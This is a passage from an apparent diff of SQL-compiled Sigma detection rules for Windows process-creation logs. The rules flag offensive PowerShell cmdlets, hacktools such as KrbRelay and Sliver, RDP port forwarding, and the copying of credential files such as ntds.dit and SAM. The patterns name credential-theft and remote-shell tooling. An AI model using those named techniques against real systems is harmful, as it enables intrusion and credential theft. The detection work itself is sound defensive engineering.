'%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE 
'%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to 
configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE 
'\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "HackTool - PowerTool Execution", + "id": 
"a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Run Once Task Execution as Configured in Registry", - "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "This rule detects the execution of Run Once task as configured in the registry", - "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - 
"attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_runonce_execution.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. 
This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "test", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired 
or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "File Deletion Via Del", + "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete 
files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_cmd_del_execution.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "title": "HackTool - ADCSPwn 
Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.t1557.001" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.g0049", "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", + "attack.t1059", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE 